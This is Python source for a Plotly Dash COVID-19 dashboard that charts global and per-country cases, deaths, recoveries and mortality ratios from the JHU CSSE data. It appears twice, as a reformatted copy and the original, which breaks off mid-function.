'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, automargin=True, showline=True, mirror =False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode= 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df. loc[final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode= 'lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F', 'Recovered': '#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x= final_df.loc[final_df['Country_Region'] == selected_country, 'Date'], y=final_df.loc[final_df['Country_Region'] == selected_country, selected_graph], marker_color=cols_dict[ selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, selected_graph].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str( selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data': figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server() <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Fri Apr 10 01:03:35 2020 @author: Jordan """ import pandas as pd import numpy as np import matplotlib.pyplot as plt from datetime import date ## from COVID19_Simple import * from COVID19_Diff import calc_diff_country ### Dash Stuff ### import dash import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.graph_objects as go import math ### Initial Code Block; Set Up Data ### urls = ['https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv', 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv', 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'] ### Base Country Data (and Transformations) final_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv') final_df = calc_diff_country(final_df) final_df['Date'] = pd.to_datetime(final_df['Date']) final_df['Country_Region'] = final_df['Country_Region'].astype(str) ### 1000 Cases, 10 Deaths, 10 Recovered ### (Global) ## 1000 Cases ## cases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date'] cases_1000_start = cases_1000_start.reset_index() cases_1000_start = cases_1000_start.rename(columns={"Date":"Start_Date"}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() cases_1000_start = pd.merge(cases_1000_start,final_df, on = ['Country_Region'],how='right') cases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date']) cases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date']) cases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()] cases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days ## 100 Deaths ## deaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date'] deaths_100_start = deaths_100_start.reset_index() deaths_100_start = deaths_100_start.rename(columns={"Date":"Start_Date"}) final_df['Country_Region'] = final_df['Country_Region'].str.strip() deaths_100_start = pd.merge(deaths_100_start,final_df, on = ['Country_Region'],how='right') deaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date']) deaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date']) deaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()] deaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days ## Mortality Ratios ## mort = final_df.groupby(['Country_Region'])['Date'].max().reset_index() mort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left') mort['Mortality_Percent'] = (mort['Deaths'] / mort['Confirmed'])*100.00 colors_dict_global = {'Europe':'#1D6996','Asia':'#CC503E','Africa':'#94346E', 'North America':'#38A6A5', 'Middle East': '#EDAD08', 'South America':'#E17C05', 'Caribbean & Central America':'#0F8554', 'Oceania':'#73AF48'} ### Dash Portion of the Script ### external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css'] app = dash.Dash(__name__, external_stylesheets=external_stylesheets) server=app.server app.layout = html.Div(children=[ html.H2(children='COVID-19 Dashboard'), html.H4(children='A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(), html.H5(children='Global View'), html.P(children='The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:'), html.Div([html.Ul([html.Li([html.B('Cumulative Cases by Country Since First 1000 Cases: '),'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis']), html.Li([html.B('Cumulative Cases by Country Since First 100 Deaths: '),'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis']), html.Li([html.B('Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)']), html.Li([html.B('Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id='global-dropdown', options=[{'label':y, 'value':y} for y in ['Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)','Recoveries vs. Deaths By Country']], placeholder = 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(), html.H5(children='Country View'), html.P('The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:'), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']), html.Li([html.B('Deaths: '),'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder = 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2', placeholder = 'Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id='btext1'), dcc.Graph(id='subplot1')], className = 'four columns', style={'color': '#648FFF'}), html.Div([html.H6(children='Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id='subplot2')], className = 'four columns', style={'color': '#DC267F'}), html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id='btext3'), dcc.Graph(id='subplot3')], className = 'four columns', style={'color': '#009E73', 'layout':'right'})], className="row") ]) ## Callback Functionality ## @app.callback( Output(component_id='global-box-1', component_property='figure'), [Input(component_id='global-dropdown', component_property='value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di['Confirmed'].tolist(), mode='lines', line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1), opacity=0.6, text= di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate='<b>%{text}</b><br>'+'<br>Confirmed Cases: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max()+1.5), 'y':np.log10(int(di['Confirmed'].max())), 'xref':'x', 'yref':'y', 'showarrow':False, 'text':list(di.loc[:, 'Country_Region'])[0], 'xanchor':'right', 'yanchor':'middle', 'align':'center', 'font':{'size':8, 'color':'black'}, 'bordercolor':"#ffffff", 'borderwidth':1, 'borderpad':1, 'bgcolor':"#ffffff", 'opacity':0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())), y = [1000 * (math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))], name='Cases Double Every 3 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dash'), text=['# of Cases Double Every 3 Days'], hovertemplate='<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())), y = [1000 * (math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))], name='Cases Double Every 7 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dot'), text=['# of Cases Double Every 7 Days'], hovertemplate='<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title':'Number of Confirmed Cases', 'range':[np.log10(1000), np.log10(cases_1000_start['Confirmed'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start['Days Since 1000 Cases'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno) fig_global={'data':fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di['Deaths'].tolist(), mode='lines', line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1), opacity=0.6, text= di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate='<b>%{text}</b><br>'+'<br>Deaths: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a={'x': int(di['Days Since 100 Deaths'].max()+1.5), 'y':np.log10(int(di['Deaths'].max())), 'xref':'x', 'yref':'y', 'showarrow':False, 'text':list(di.loc[:, 'Country_Region'])[0], 'xanchor':'right', 'yanchor':'middle', 'align':'center', 'font':{'size':8, 'color':'black'}, 'bordercolor':"#ffffff", 'borderwidth':1, 'borderpad':1, 'bgcolor':"#ffffff", 'opacity':0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())), y = [100 * (math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))], name='Deaths Double Every 3 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dash'), text=['# of Deaths Double Every 3 Days'], hovertemplate='<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())), y = [100 * (math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))], name='Deaths Double Every 7 Days', mode='lines', opacity=.25, line = dict(color='grey', width=3, dash='dot'), text=['# of Deaths Double Every 7 Days'], hovertemplate='<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title':'Number of Deaths', 'range':[np.log10(100), np.log10(cases_1000_start['Deaths'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno) fig_global={'data':fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno =[] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] #m1 = [str(i) for i in m1] m2 = m.loc[i, 'Mortality_Percent'] #m2 = [str(round(i, 2)) for i in m2] trace = go.Bar(name='Observed Case - Mortality Ratio', x = [m2], y= [m1], text = [round(m.loc[i, 'Mortality_Percent'], 2)], orientation ='h', textposition='auto', marker = dict(color='#FFB000', opacity=0.6, line=dict(color='rgba(255,176,0, 1)', width=1)), hovertemplate='<b>%{y}</b><br>'+'<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title':'Country / Region','fixedrange':True, 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [0, m['Mortality_Percent'].max() + 2], 'fixedrange':True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=750, hovermode='closest') fig_global={'data':figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >=100)].reset_index() for i in range(len(rc)): scat = go.Scatter( x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=(colors_dict_global[rc.loc[i, 'Continent']]), showlegend=False, marker=dict(size=12,line_width=1, opacity=0.75), hovertemplate='<b>%{text}</b><br>'+'<br>Recoveries: %{y}<br>'+'Deaths: %{x}<br>', textposition='bottom center', textfont=dict(size=10, color='rgba(0, 0, 0, 0.6)') ) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=.25, line = dict(color='grey', width=1), text=['# of Deaths = # of Recoveries'], hovertemplate='<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i*2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=.25, line = dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate='<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(), 3)), y = [i/2 for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=.25, line = dict(color='firebrick', width=3, dash='dash'), text=['2 Deaths for Every Recovery'], hovertemplate='<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title':'Number of Recoveries','fixedrange':True, 'automargin': True, 'range':[np.log10(100), np.log10(rc['Recovered'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, title='Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths','fixedrange':True, 'range':[np.log10(100), np.log10(rc['Deaths'].max() * 1.10)], 'type':'log', 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, height=750, hovermode='closest') fig_global={'data':figscat, 'layout': layout_global} return fig_global @app.callback( [Output(component_id='main-dropdown-2', component_property = 'options'), Output(component_id='btext1', component_property='children'), Output(component_id='subplot1', component_property = 'figure'), Output(component_id='btext2', component_property='children'), Output(component_id='subplot2', component_property = 'figure'), Output(component_id='btext3', component_property='children'), Output(component_id='subplot3', component_property = 'figure')], [Input(component_id='main-dropdown', component_property = 'value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), 